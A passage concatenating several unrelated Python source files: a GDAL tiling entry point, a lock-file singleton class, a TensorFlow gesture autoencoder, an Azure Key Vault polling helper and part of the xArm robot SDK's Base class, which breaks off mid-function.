# TODO: gbataille - use mkdtemp to work in a temp directory
# TODO: gbataille - debug intermediate tiles.vrt not produced anymore?
# TODO: gbataille - Refactor generate overview tiles to not depend on self variables
argv = gdal.GeneralCmdLineProcessor(sys.argv)
input_file, output_folder, options = process_args(argv[1:])
nb_processes = options.nb_processes or 1
if nb_processes == 1:
single_threaded_tiling(input_file, output_folder, options)
else:
multi_threaded_tiling(input_file, output_folder, options)
if __name__ == '__main__':
main()
# vim: set tabstop=4 shiftwidth=4 expandtab:
|
singleton.py
|
"""
Taken from https://github.com/pycontribs/tendo/blob/master/tendo/singleton.py on 01/01/2021 and modified to remove error message
"""
from multiprocessing import Process
import os
import sys
import tempfile
if sys.platform != "win32":
import fcntl
class SingleInstanceException(BaseException):
pass
class SingleInstance(object):
"""Class that can be instantiated only once per machine.
If you want to prevent your script from running in parallel just instantiate SingleInstance() class. If is there another instance already running it will throw a `SingleInstanceException`.
This option is very useful if you have scripts executed by crontab at small amounts of time.
Remember that this works by creating a lock file with a filename based on the full path to the script file.
Providing a flavor_id will augment the filename with the provided flavor_id, allowing you to create multiple singleton instances from the same file. This is particularly useful if you want specific functions to have their own singleton instances.
"""
def __init__(self, flavor_id="", lockfile=""):
self.initialized = False
if lockfile:
self.lockfile = lockfile
else:
basename = os.path.splitext(os.path.abspath(sys.argv[0]))[0].replace(
"/", "-").replace(":", "").replace("\\", "-") + '-%s' % flavor_id + '.lock'
self.lockfile = os.path.normpath(
tempfile.gettempdir() + '/' + basename)
# logger.debug("SingleInstance lockfile: " + self.lockfile)
if sys.platform == 'win32':
try:
# file already exists, we try to remove (in case previous
# execution was interrupted)
if os.path.exists(self.lockfile):
os.unlink(self.lockfile)
self.fd = os.open(
self.lockfile, os.O_CREAT | os.O_EXCL | os.O_RDWR)
except OSError:
type, e, tb = sys.exc_info()
if e.errno == 13:
# logger.error(
# "Another instance is already running, quitting.")
raise SingleInstanceException()
print(e.errno)
raise
else: # non Windows
self.fp = open(self.lockfile, 'w')
self.fp.flush()
try:
fcntl.lockf(self.fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
# logger.warning(
# "Another instance is already running, quitting.")
raise SingleInstanceException()
self.initialized = True
def __del__(self):
if not self.initialized:
return
try:
if sys.platform == 'win32':
if hasattr(self, 'fd'):
os.close(self.fd)
os.unlink(self.lockfile)
else:
fcntl.lockf(self.fp, fcntl.LOCK_UN)
# os.close(self.fp)
if os.path.isfile(self.lockfile):
os.unlink(self.lockfile)
except Exception as e:
if logger:
logger.warning(e)
else:
print("Unloggable error: %s" % e)
sys.exit(-1)
def f(name):
# tmp = logger.level
# logger.setLevel(logging.CRITICAL) # we do not want to see the warning
try:
me2 = SingleInstance(flavor_id=name) # noqa
except SingleInstanceException:
sys.exit(-1)
# logger.setLevel(tmp)
pass
# class testSingleton(unittest.TestCase):
#
# def test_1(self):
# me = SingleInstance(flavor_id="test-1")
# del me # now the lock should be removed
# assert True
#
# def test_2(self):
# p = Process(target=f, args=("test-2",))
# p.start()
# p.join()
# # the called function should succeed
# assert p.exitcode == 0, "%s != 0" % p.exitcode
#
# def test_3(self):
# me = SingleInstance(flavor_id="test-3") # noqa -- me should still kept
# p = Process(target=f, args=("test-3",))
# p.start()
# p.join()
# # the called function should fail because we already have another
# # instance running
# assert p.exitcode != 0, "%s != 0 (2nd execution)" % p.exitcode
# # note, we return -1 but this translates to 255 meanwhile we'll
# # consider that anything different from 0 is good
# p = Process(target=f, args=("test-3",))
# p.start()
# p.join()
# # the called function should fail because we already have another
# # instance running
# assert p.exitcode != 0, "%s != 0 (3rd execution)" % p.exitcode
#
# def test_4(self):
# lockfile = '/tmp/foo.lock'
# me = SingleInstance(lockfile=lockfile)
# assert me.lockfile == lockfile
#
#
# logger = logging.getLogger("tendo.singleton")
# if __name__ == "__main__":
# logger.addHandler(logging.StreamHandler())
# logger.setLevel(logging.DEBUG)
# unittest.main()
|
main_autoencoder.py
|
import os
import queue
import threading
from time import sleep
import numpy as np
import tensorflow as tf
from tensorflow.python.training.adam import AdamOptimizer
from env import MultiArmTorqueEnvironment
from models import autoencoder_seq
N_ITERATIONS = 10000
N_JOINTS = 2
SEQ_LEN = 16
BATCH_SIZE = 1024 * 16
MOTION_SELECTION = 4 * 4
LSTM_SIZE = MOTION_SELECTION + 2 ** N_JOINTS
MOTIONS = np.identity(MOTION_SELECTION)
# BATCH_SIZE, MOTION_SELECTION
selected_gesture = tf.placeholder(tf.float32, [None, MOTION_SELECTION], 'selected_gesture')
batch_sz = tf.shape(selected_gesture)[0]
noise_op = tf.random_uniform([batch_sz, SEQ_LEN], -1, 1, tf.float32, None, 'noise_sequence')
with tf.variable_scope('noisy_initial_state'):
x = lambda: tf.random_uniform([batch_sz, LSTM_SIZE], -1, 1, tf.float32)
initial_state_op = [[x(), x()], [x(), x()]]
with tf.variable_scope('autoencoder'):
# [BATCH_SIZE, MOTION_SELECTION] , [BATCH_SIZE, SEQ_LEN, N_JOINTS]
softmax_class_op, pred_states_op, _ = autoencoder_seq(selected_gesture, noise_op, initial_state_op, SEQ_LEN,
N_JOINTS,
LSTM_SIZE)
with tf.variable_scope('eval'):
pred_class, true_class = tf.argmax(softmax_class_op, axis=1), tf.argmax(selected_gesture, axis=1)
accuracy = tf.divide(tf.count_nonzero(tf.equal(pred_class, true_class), dtype=tf.int32), batch_sz, name='accuracy')
tf.summary.scalar('accuracy', accuracy)
from tflearn.objectives import categorical_crossentropy
loss = categorical_crossentropy(softmax_class_op, selected_gesture)
tf.summary.scalar('classification_loss', loss)
with tf.variable_scope('optimize'):
lr_op = tf.Variable(5e-4, False, dtype=tf.float32)
decay_lr_op = tf.assign(lr_op, lr_op * (1 - 1e-4))
tf.summary.scalar('learning_rate', lr_op)
with tf.control_dependencies([decay_lr_op]):
train_step = AdamOptimizer(learning_rate=lr_op).minimize(loss)
display_q = queue.Queue(10)
def display():
while True:
softmax_class, display_states = display_q.get()
print("Prediction: ", np.max(softmax_class, axis=1))
for states in np.transpose(display_states, axes=[1, 0, 2]):
env.step(states)
env.render()
sleep(.2 / (display_q.qsize() + 1))
env.reset()
threading.Thread(target=display).start()
summaries_op = tf.summary.merge_all()
writer = tf.summary.FileWriter(os.environ['logdir'] + '/creative_autoencoder/', tf.get_default_graph())
env = MultiArmTorqueEnvironment(n_arms=MOTION_SELECTION, n_joints=N_JOINTS, time_lim=SEQ_LEN)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(tf.global_variables_initializer())
for iteration in range(N_ITERATIONS):
batch = MOTIONS[np.random.randint(0, MOTION_SELECTION, BATCH_SIZE)]
_, summaries, _ = sess.run([train_step, summaries_op, decay_lr_op], feed_dict={selected_gesture: batch})
writer.add_summary(summaries)
if iteration % 40 == 0:
display_q.put(sess.run([softmax_class_op, pred_states_op], feed_dict={selected_gesture: MOTIONS}))
writer.flush()
env.reset()
|
_polling.py
|
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import logging
import time
import threading
import uuid
from typing import TYPE_CHECKING
from azure.core.polling import PollingMethod, LROPoller
from azure.core.exceptions import ResourceNotFoundError, HttpResponseError
try:
from urlparse import urlparse # type: ignore # pylint: disable=unused-import
except ImportError:
from urllib.parse import urlparse
from azure.core.pipeline.transport._base import HttpResponse # type: ignore
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.common import with_current_context
if TYPE_CHECKING:
# pylint: disable=ungrouped-imports
from typing import Any, Callable, Union, List, Optional
logger = logging.getLogger(__name__)
class KeyVaultOperationPoller(LROPoller):
"""Poller for long running operations where calling result() doesn't wait for operation to complete.
"""
# pylint: disable=arguments-differ
def __init__(self, polling_method):
# type: (PollingMethod) -> None
# pylint: disable=super-init-not-called
self._polling_method = polling_method
# Prepare thread execution
self._thread = None
self._done = None
self._exception = None
# pylint: disable=arguments-differ
def result(self):
# type: () -> Any
"""Returns a representation of the final resource without waiting for the operation to complete.
:returns: The deserialized resource of the long running operation
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
return self._polling_method.resource()
@distributed_trace
def wait(self, timeout=None):
# type: (Optional[int]) -> None
"""Wait on the long running operation for a number of seconds.
You can check if this call has ended with timeout with the "done()" method.
:param int timeout: Period of time to wait for the long running
operation to complete (in seconds).
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
if not self._polling_method.finished():
self._done = threading.Event()
self._thread = threading.Thread(
target=with_current_context(self._start),
name="KeyVaultOperationPoller({})".format(uuid.uuid4()))
self._thread.daemon = True
self._thread.start()
if self._thread is None:
return
self._thread.join(timeout=timeout)
try:
# Let's handle possible None in forgiveness here
raise self._exception # type: ignore
except TypeError: # Was None
pass
class RecoverDeletedPollingMethod(PollingMethod):
def __init__(self, command, final_resource, initial_status, finished_status, interval=2):
self._command = command
self._resource = final_resource
self._polling_interval = interval
self._status = initial_status
self._finished_status = finished_status
def _update_status(self):
# type: () -> None
try:
self._command()
self._status = self._finished_status
except ResourceNotFoundError:
pass
except HttpResponseError as e:
if e.status_code == 403:
self._status = self._finished_status
else:
raise
def initialize(self, client, initial_response, deserialization_callback):
pass
def run(self):
# type: () -> None
try:
while not self.finished():
self._update_status()
time.sleep(self._polling_interval)
except Exception as e:
logger.warning(str(e))
raise
def finished(self):
# type: () -> bool
return self._status == self._finished_status
def resource(self):
# type: () -> Any
return self._resource
def status(self):
# type: () -> str
return self._status
class DeletePollingMethod(RecoverDeletedPollingMethod):
def __init__(self, command, final_resource, initial_status, finished_status, sd_disabled, interval=2):
self._sd_disabled = sd_disabled
super(DeletePollingMethod, self).__init__(
command=command,
final_resource=final_resource,
initial_status=initial_status,
finished_status=finished_status,
interval=interval
)
def finished(self):
# type: () -> bool
return self._sd_disabled or self._status == self._finished_status
|
base.py
|
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2020, UFACTORY, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>
import re
import time
import math
import threading
try:
from multiprocessing.pool import ThreadPool
except:
ThreadPool = None
try:
import asyncio
except:
asyncio = None
from .events import Events
from ..core.config.x_config import XCONF
from ..core.comm import SerialPort, SocketPort
from ..core.wrapper import UxbusCmdSer, UxbusCmdTcp
from ..core.utils.log import logger, pretty_print
from ..core.utils import convert
from ..core.config.x_code import ControllerWarn, ControllerError, ControllerErrorCodeMap, ControllerWarnCodeMap
from .utils import xarm_is_connected, compare_time, compare_version, xarm_is_not_simulation_mode, filter_invaild_number, xarm_is_pause, xarm_wait_until_cmdnum_lt_max
from .code import APIState
from ..tools.threads import ThreadManage
from ..version import __version__
controller_error_keys = ControllerErrorCodeMap.keys()
controller_warn_keys = ControllerWarnCodeMap.keys()
print('SDK_VERSION: {}'.format(__version__))
class Base(Events):
def __init__(self, port=None, is_radian=False, do_not_open=False, **kwargs):
if kwargs.get('init', False):
super(Base, self).__init__()
self._port = port
self._debug = kwargs.get('debug', False)
self._baudrate = kwargs.get('baudrate', XCONF.SerialConf.SERIAL_BAUD)
self._timeout = kwargs.get('timeout', None)
self._filters = kwargs.get('filters', None)
self._enable_heartbeat = kwargs.get('enable_heartbeat', False)
self._enable_report = kwargs.get('enable_report', True)
self._report_type = kwargs.get('report_type', 'rich')
self._forbid_uds = kwargs.get('forbid_uds', False)
self._check_tcp_limit = kwargs.get('check_tcp_limit', False)
self._check_joint_limit = kwargs.get('check_joint_limit', True)
self._check_cmdnum_limit = kwargs.get('check_cmdnum_limit', True)
self._check_simulation_mode = kwargs.get('check_simulation_mode', True)
self._max_cmd_num = kwargs.get('max_cmdnum', 512)
if not isinstance(self._max_cmd_num, int):
self._max_cmd_num = 512
self._max_cmd_num = min(XCONF.MAX_CMD_NUM, self._max_cmd_num)
self._check_robot_sn = kwargs.get('check_robot_sn', False)
self._check_is_ready = kwargs.get('check_is_ready', True)
self._check_is_pause = kwargs.get('check_is_pause', True)
self._timed_comm = kwargs.get('timed_comm', True)
self._timed_comm_interval = kwargs.get('timed_comm_interval', 30)
self._timed_comm_t = None
self._timed_comm_t_alive = False
self._max_callback_thread_count = kwargs.get('max_callback_thread_count', 0)
self._asyncio_loop = None
self._asyncio_loop_alive = False
self._asyncio_loop_thread = None
self._pool = None
self._thread_manage = ThreadManage()
self._rewrite_modbus_baudrate_method = kwargs.get('rewrite_modbus_baudrate_method', True)
self._min_tcp_speed, self._max_tcp_speed = 0.1, 1000 # mm/s
self._min_tcp_acc, self._max_tcp_acc = 1.0, 50000 # mm/s^2
self._tcp_jerk = 1000 # mm/s^3
self._min_joint_speed, self._max_joint_speed = 0.01, 4.0 # rad/s
self._min_joint_acc, self._max_joint_acc = 0.01, 20.0 # rad/s^2
self._joint_jerk = 20.0 # rad/s^3
self._rot_jerk = 2.3
self._max_rot_acc = 2.7
self._stream_type = 'serial'
self._stream = None
self.arm_cmd = None
self._stream_report = None
self._report_thread = None
self._only_report_err_warn_changed = True
self._last_position = [201.5, 0, 140.5, 3.1415926, 0, 0] # [x(mm), y(mm), z(mm), roll(rad), pitch(rad), yaw(rad)]
self._last_angles = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] # [servo_1(rad), servo_2(rad), servo_3(rad), servo_4(rad), servo_5(rad), servo_6(rad), servo_7(rad)]
self._last_tcp_speed = 100 # mm/s, rad/s
self._last_tcp_acc = 2000 # mm/s^2, rad/s^2
self._last_joint_speed = 0.3490658503988659 # 20 °/s
self._last_joint_acc = 8.726646259971648 # 500 °/s^2
self._mvtime = 0
self._version = None
self._robot_sn = None
self._control_box_sn = None
self._position = [201.5, 0, 140.5, 3.1415926, 0, 0]
self._pose_aa = [201.5, 0, 140.5, 3.1415926, 0, 0]
self._angles = [0] * 7
self._position_offset = [0] * 6
self._world_offset = [0] * 6
self._state = 4
self._mode = 0
self._joints_torque = [0, 0, 0, 0, 0, 0, 0] # 力矩
self._tcp_load = [0, [0, 0, 0]] # 负载[重量, 重心], [weight, [x, y, z]]
self._collision_sensitivity = 0 # 碰撞灵敏度
self._teach_sensitivity = 0 # 示教灵敏度
self._error_code = 0
self._warn_code = 0
self._servo_codes = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]
self._cmd_num = 0
self._arm_type = XCONF.Robot.Type.XARM7_X4
self._arm_axis = XCONF.Robot.Axis.XARM7
axis = kwargs.get('axis', self._arm_axis)
if axis in [5, 6, 7]:
self._arm_axis = axis
arm_type = kwargs.get('type', self._arm_type)
if arm_type in [3, 5, 6, 7, 8]:
self._arm_type = arm_type
self._arm_master_id = 0
self._arm_slave_id = 0
self._arm_motor_tid = 0
self._arm_motor_fid = 0
self._arm_motor_brake_states = [-1, -1, -1, -1, -1, -1, -1, -1] # [motor-1-brake-state, ..., motor-7-brake, reserved]
self._arm_motor_enable_states = [-1, -1, -1, -1, -1, -1, -1, -1] # [motor-1-enable-state, ..., motor-7-enable, reserved]
self._gravity_direction = [0, 0, -1]
self._is_ready = False
self._is_sync = False
self._is_first_report = True
self._first_report_over = False
self._default_is_radian = is_radian
self._sleep_finish_time = time.time()
self._is_old_protocol = False
self._major_version_number = 0 # 固件主版本号
self._minor_version_number = 0 # 固件次版本号
self._revision_version_number = 0 # 固件修正版本号
self._temperatures = [0, 0, 0, 0, 0, 0, 0]
self._voltages = [0, 0, 0, 0, 0, 0, 0]
self._currents = [0, 0, 0, 0, 0, 0, 0]
self._is_set_move = False
self._pause_cond = threading.Condition()
self._pause_lock = threading.Lock()
self._pause_cnts = 0
self._realtime_tcp_speed = 0
self._realtime_joint_speeds = [0, 0, 0, 0, 0, 0, 0]
self._count = -1
self._last_report_time = time.time()
self._max_report_interval = 0
self._cgpio_reset_enable = 0
self._tgpio_reset_enable = 0
self._cgpio_states = [0, 0, 256, 65533, 0, 65280, 0, 0, 0.0, 0.0, [0, 0, 0, 0, 0, 0, 0, 0], [0, 0, 0, 0, 0, 0, 0, 0]]
self._iden_progress = 0
self._ignore_error = False
self._ignore_state = False
self.modbus_baud = -1
self.gripper_is_enabled = False
self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = 0
self.bio_gripper_error_code = 0
self.robotiq_is_activated = False
self._cmd_timeout = XCONF.UxbusConf.SET_TIMEOUT / 1000
self._is_collision_detection = 1
self._collision_tool_type = 0
self._collision_tool_params = [0, 0, 0, 0, 0, 0]
self._is_simulation_robot = False
self._last_update_err_time = 0
self._last_update_state_time = 0
self._last_update_cmdnum_time = 0
self._arm_type_is_1300 = False
self._control_box_type_is_1300 = False
self.linear_track_baud = -1
self.linear_track_speed = 1
self.linear_track_is_enabled = False
self._ft_ext_force = [0, 0, 0, 0, 0, 0]
self._ft_raw_force = [0, 0, 0, 0, 0, 0]
self._has_motion_cmd = False
self._need_sync = False
if not do_not_open:
self.connect()
def _init(self):
self._last_position = [201.5, 0, 140.5, 3.1415926, 0, 0] # [x(mm), y(mm), z(mm), roll(rad), pitch(rad), yaw(rad)]
self._last_angles = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] # [servo_1(rad), servo_2(rad), servo_3(rad), servo_4(rad), servo_5(rad), servo_6(rad), servo_7(rad)]
self._last_tcp_speed = 100 # mm/s, rad/s
self._last_tcp_acc = 2000 # mm/s^2, rad/s^2
self._last_joint_speed = 0.3490658503988659 # 20 °/s
self._last_joint_acc = 8.726646259971648 # 500 °/s^2
self._mvtime = 0
self._version = None
self._robot_sn = None
self._control_box_sn = None
self._position = [201.5, 0, 140.5, 3.1415926, 0, 0]
self._pose_aa = [201.5, 0, 140.5, 3.1415926, 0, 0]
self._angles = [0] * 7
self._position_offset = [0] * 6
self._world_offset = [0] * 6
self._state = 4
self._mode = 0
self._joints_torque = [0, 0, 0, 0, 0, 0, 0] # 力矩
self._tcp_load = [0, [0, 0, 0]] # 负载[重量, 重心], [weight, [x, y, z]]
self._collision_sensitivity = 0 # 碰撞灵敏度
self._teach_sensitivity = 0 # 示教灵敏度
self._error_code = 0
self._warn_code = 0
self._servo_codes = [[0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0], [0, 0]]
self._cmd_num = 0
self._arm_master_id = 0
self._arm_slave_id = 0
self._arm_motor_tid = 0
self._arm_motor_fid = 0
self._arm_motor_brake_states = [-1, -1, -1, -1, -1, -1, -1,
-1] # [motor-1-brake-state, ..., motor-7-brake, reserved]
self._arm_motor_enable_states = [-1, -1, -1, -1, -1, -1, -1,
-1] # [motor-1-enable-state, ..., motor-7-enable, reserved]
self._gravity_direction = [0, 0, -1]
self._is_ready = False
self._is_sync = False
self._is_first_report = True
self._first_report_over = False
self._sleep_finish_time = time.time()
self._is_old_protocol = False
self._major_version_number = 0 # 固件主版本号
self._minor_version_number = 0 # 固件次版本号
self._revision_version_number = 0 # 固件修正版本号
self._temperatures = [0, 0, 0, 0, 0, 0, 0]
self._voltages = [0, 0, 0, 0, 0, 0, 0]
self._currents = [0, 0, 0, 0, 0, 0, 0]
self._is_set_move = False
self._pause_cond = threading.Condition()
self._pause_lock = threading.Lock()
self._pause_cnts = 0
self._realtime_tcp_speed = 0
self._realtime_joint_speeds = [0, 0, 0, 0, 0, 0, 0]
self._count = -1
self._last_report_time = time.time()
self._max_report_interval = 0
self._cgpio_reset_enable = 0
self._tgpio_reset_enable = 0
self._cgpio_states = [0, 0, 256, 65533, 0, 65280, 0, 0, 0.0, 0.0, [0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0]]
self._iden_progress = 0
self._ignore_error = False
self._ignore_state = False
self.modbus_baud = -1
self.gripper_is_enabled = False
self.gripper_speed = 0
self.gripper_version_numbers = [-1, -1, -1]
self.bio_gripper_is_enabled = False
self.bio_gripper_speed = 0
self.bio_gripper_error_code = 0
self.robotiq_is_activated = False
self._cmd_timeout = XCONF.UxbusConf.SET_TIMEOUT / 1000
self._is_collision_detection = 1
self._collision_tool_type = 0
self._collision_tool_params = [0, 0, 0, 0, 0, 0]
self._is_simulation_robot = False
self._last_update_err_time = 0
self._last_update_state_time = 0
self._last_update_cmdnum_time = 0
self._arm_type_is_1300 = False
self._control_box_type_is_1300 = False
self.linear_track_baud = -1
self.linear_track_speed = 1
self.linear_track_is_enabled = False
self._ft_ext_force = [0, 0, 0, 0, 0, 0]
self._ft_raw_force = [0, 0, 0, 0, 0, 0]
self._has_motion_cmd = False
self._need_sync = False
@staticmethod
def log_api_info(msg, *args, code=0, **kwargs):
if code == 0:
logger.info(msg, *args, **kwargs)
else:
logger.error(msg, *args, **kwargs)
def _check_version(self, is_first=False):
if is_first:
self._version = None
self._robot_sn = None
self._control_box_sn = None
try:
if not self._version:
self.get_version()
if is_first:
fail_cnt = 0
while not self._version and fail_cnt < 100:
code, _ = self.get_version()
fail_cnt += 1 if code != 0 else 0
if code != 0 or not self._version:
time.sleep(0.1)
if not self._version and fail_cnt >= 100:
logger.error('failed to get version')
return -2
if self._version and isinstance(self._version, str):
pattern = re.compile(
r'.*(\d+),(\d+),(\S+),(\S+),.*[vV](\d+)\.(\d+)\.(\d+)')
m = re.match(pattern, self._version)
if m:
(xarm_axis, xarm_type, xarm_sn, ac_version,
major_version_number,
minor_version_number,
revision_version_number) = m.groups()
self._arm_axis = int(xarm_axis)
self._arm_type = int(xarm_type)
self._major_version_number = int(major_version_number)
self._minor_version_number = int(minor_version_number)
self._revision_version_number = int(revision_version_number)
self._robot_sn = xarm_sn
self._control_box_sn = ac_version.strip()
self._arm_type_is_1300 = int(xarm_sn[2:6]) >= 1300 if xarm_sn[2:6].isdigit() else False
self._control_box_type_is_1300 = int(ac_version[2:6]) >= 1300 if ac_version[2:6].isdigit() else False
else:
pattern = re.compile(r'.*[vV](\d+)\.(\d+)\.(\d+)')
m = re.match(pattern, self._version)
if m:
(self._major_version_number,
self._minor_version_number,
self._revision_version_number) = map(int, m.groups())
else:
version_date = '-'.join(self._version.split('-')[-3:])
self._is_old_protocol = compare_time('2019-02-01', version_date)
if self._is_old_protocol:
self._major_version_number = 0
self._minor_version_number = 0
self._revision_version_number = 1
else:
self._major_version_number = 0
self._minor_version_number = 1
self._revision_version_number = 0
if is_first:
if self._check_robot_sn:
count = 2
self.get_robot_sn()
while not self._robot_sn and count and self.warn_code == 0:
self.get_robot_sn()
self.get_err_warn_code()
if not self._robot_sn and self.warn_code == 0 and count:
time.sleep(0.1)
count -= 1
if self.warn_code != 0:
self.clean_warn()
print('FIRMWARE_VERSION: v{}, PROTOCOL: {}, DETAIL: {}'.format(
'{}.{}.{}'.format(self._major_version_number, self._minor_version_number, self._revision_version_number),
'V0' if self._is_old_protocol else 'V1', self._version
))
return 0
except Exception as e:
print('compare_time: {}, {}'.format(self._version, e))
return -1
@property
def realtime_tcp_speed(self):
return self._realtime_tcp_speed
@property
def realtime_joint_speeds(self):
return [speed if self._default_is_radian else math.degrees(speed) for speed in self._realtime_joint_speeds]
@property
def version_number(self):
return self._major_version_number, self._minor_version_number, self._revision_version_number
@property
def connected(self):
return self._stream and self._stream.connected
@property
def ready(self):
return self._is_ready
@property
def default_is_radian(self):
return self._default_is_radian
@property
def is_simulation_robot(self):
return self._is_simulation_robot
def check_is_simulation_robot(self):
return self._check_simulation_mode and self.is_simulation_robot
# return self._check_simulation_mode and self.mode != 4
@property
def version(self):
if not self._version:
self.get_version()
return self._version
# return 'v' + '.'.join(map(str, self.version_number))
@property
def sn(self):
return self._robot_sn
@property
def control_box_sn(self):
return self._control_box_sn
@property
def position(self):
if not self._enable_report:
self.get_position()
return [math.degrees(self._position[i]) if 2 < i < 6 and not self._default_is_radian
else self._position[i] for i in range(len(self._position))]
@property
def position_aa(self):
if not self._enable_report:
self.get_position_aa()
return [math.degrees(self._pose_aa[i]) if 2 < i < 6 and not self._default_is_radian
else self._pose_aa[i] for i in range(len(self._pose_aa))]
@property
def tcp_jerk(self):
return self._tcp_jerk
@property
def tcp_speed_limit(self):
return [self._min_tcp_speed, self._max_tcp_speed]
@property
def tcp_acc_limit(self):
return [self._min_tcp_acc, self._max_tcp_acc]
@property
def last_used_position(self):
return [math.degrees(self._last_position[i]) if 2 < i < 6 and not self._default_is_radian
else self._last_position[i] for i in range(len(self._last_position))]
@property
def last_used_tcp_speed(self):
return self._last_tcp_speed
@property
def last_used_tcp_acc(self):
return self._last_tcp_acc
@property
def angles(self):
if not self._enable_report:
self.get_servo_angle()
return [angle if self._default_is_radian else math.degrees(angle) for angle in self._angles]
@property
def joint_jerk(self):
return self._joint_jerk if self._default_is_radian else math.degrees(self._joint_jerk)
@property
def joint_speed_limit(self):
limit = [self._min_joint_speed, self._max_joint_speed]
if not self._default_is_radian:
limit = [math.degrees(i) for i in limit]
return limit
@property
def joint_acc_limit(self):
limit = [self._min_joint_acc, self._max_joint_acc]
if not self._default_is_radian:
limit = [math.degrees(i) for i in limit]
return limit
@property
def last_used_angles(self):
return [angle if self._default_is_radian else math.degrees(angle) for angle in self._last_angles]
@property
def last_used_joint_speed(self):
return self._last_joint_speed if self._default_is_radian else math.degrees(self._last_joint_speed)
@property
def last_used_joint_acc(self):
return self._last_joint_acc if self._default_is_radian else math.degrees(self._last_joint_acc)
@property
def position_offset(self):
return [math.degrees(self._position_offset[i]) if 2 < i < 6 and not self._default_is_radian
else self._position_offset[i] for i in range(len(self._position_offset))]
@property
def world_offset(self):
return [math.degrees(self._world_offset[i]) if 2 < i < 6 and not self._default_is_radian
else self._world_offset[i] for i in range(len(self._world_offset))]
@property
def state(self):
if not self._enable_report:
self.get_state()
return self._state
@property
def mode(self):
return self._mode
@property
def joints_torque(self):
return self._joints_torque
@property
def tcp_load(self):
return self._tcp_load
@property
def collision_sensitivity(self):
return self._collision_sensitivity
@property
def teach_sensitivity(self):
return self._teach_sensitivity
@property
def motor_brake_states(self):
return self._arm_motor_brake_states
@property
def motor_enable_states(self):
return self._arm_motor_enable_states
@property
def temperatures(self):
return self._temperatures
@property
def error_code(self):
if not self._enable_report:
self.get_err_warn_code()
return self._error_code
@property
def warn_code(self):
if not self._enable_report:
self.get_err_warn_code()
return self._warn_code
@property
def has_error(self):
return self.error_code != 0
@property
def has_warn(self):
return self.warn_code != 0
@property
def has_err_warn(self):
return self.has_error or self._warn_code != 0 or (self.arm_cmd and self.arm_cmd.has_err_warn)
@property
def cmd_num(self):
if not self._enable_report:
self.get_cmdnum()
return self._cmd_num
@property
def device_type(self):
return self._arm_type
@property
def axis(self):
return self._arm_axis
@property
def master_id(self):
return self._arm_master_id
@property
def slave_id(self):
return self._arm_slave_id
@property
def motor_tid(self):
return self._arm_motor_tid
@property
def motor_fid(self):
return self._arm_motor_fid
@property
def gravity_direction(self):
return self._gravity_direction
@property
def gpio_reset_config(self):
return [self._cgpio_reset_enable, self._tgpio_reset_enable]
@property
def count(self):
return self._count
@property
def servo_codes(self):
return self._servo_codes
@property
def is_stop(self):
return self.state in [4, 5]
@property
def voltages(self):
return self._voltages
@property
def currents(self):
return self._currents
@property
def cgpio_states(self):
return self._cgpio_states
@property
def self_collision_params(self):
return [self._is_collision_detection, self._collision_tool_type, self._collision_tool_params]
@property
def ft_ext_force(self):
return self._ft_ext_force
@property
def ft_raw_force(self):
return self._ft_raw_force
def version_is_ge(self, major, minor=0, revision=0):
if self._version is None:
self._check_version()
return self._major_version_number > major or (
self._major_version_number == major and self._minor_version_number > minor) or (
self._major_version_number == major and self._minor_version_number == minor and
self._revision_version_number >= revision)
def check_is_pause(self):
if self._check_is_pause:
if self.state == 3 and self._enable_report:
with self._pause_cond:
with self._pause_lock:
self._pause_cnts += 1
self._pause_cond.wait()
with self._pause_lock:
self._pause_cnts -= 1
@property
def state_is_ready(self):
if self._check_is_ready and not self.version_is_ge(1, 5, 20):
return self.ready
else:
return True
def _timed_comm_thread(self):
self._timed_comm_t_alive = True
cnt = 0
while self.connected and self._timed_comm_t_alive:
if self.arm_cmd and time.time() - self.arm_cmd.last_comm_time > self._timed_comm_interval:
try:
if cnt == 0:
code, _ = self.get_cmdnum()
elif cnt == 1:
code, _ = self.get_state()
else:
code, _ = self.get_err_warn_code()
cnt = (cnt + 1) % 3
except:
pass
time.sleep(0.5)
def _clean_thread(self):
self._thread_manage.join(1)
if self._pool:
try:
self._pool.close()
self._pool.join()
except:
pass
def connect(self, port=None, baudrate=None, timeout=None, axis=None, arm_type=None):
if self.connected:
return
if axis in [5, 6, 7]:
self._arm_axis = axis
if arm_type in [3, 5, 6, 7]:
self._arm_type = arm_type
self._is_ready = True
self._port = port if port is not None else self._port
self._baudrate = baudrate if baudrate is not None else self._baudrate
self._timeout = timeout if timeout is not None else self._timeout
if not self._port:
raise Exception('can not connect to port/ip {}'.format(self._port))
if self._timed_comm_t is not None:
try:
self._timed_comm_t_alive = False
self._timed_comm_t.join()
self._timed_comm_t = None
except:
pass
self._is_first_report = True
self._first_report_over = False
self._init()
if isinstance(self._port, (str, bytes)):
if self._port == 'localhost' or re.match(
r"^(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)$",
self._port):
self._stream = SocketPort(self._port, XCONF.SocketConf.TCP_CONTROL_PORT,
heartbeat=self._enable_heartbeat,
buffer_size=XCONF.SocketConf.TCP_CONTROL_BUF_SIZE, forbid_uds=self._forbid_uds)
if not self.connected:
raise Exception('connect socket failed')
self._report_error_warn_changed_callback()
self.arm_cmd = UxbusCmdTcp(self._stream)
self._stream_type = 'socket'
try:
if self._timed_comm:
self._timed_comm_t = threading.Thread(target=self._timed_comm_thread, daemon=True)
self._timed_comm_t.start()
except:
pass
self._stream_report = None
try:
